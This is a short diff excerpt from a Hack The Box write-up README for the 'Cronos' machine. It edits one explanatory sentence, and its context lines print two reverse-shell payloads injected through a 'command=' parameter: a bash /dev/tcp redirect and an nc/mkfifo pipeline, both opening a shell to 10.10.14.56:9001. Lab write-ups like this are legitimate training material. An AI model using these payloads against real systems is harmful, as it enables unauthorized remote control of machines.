thomaslaurenson/trophyroom/hackthebox/machines/cronos/README.md

 command=bash -i >& /dev/tcp/10.10.14.56/9001 0>&1
 ```

-Second try was using `nc` which I checked existance of on the target machine with `which nc`.
+Second try was using `nc` which I checked existance of on the target machine with `which nc` before using the payload.
 Then used the following payload:

 ```none
 command=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.56 9001 >/tmp/f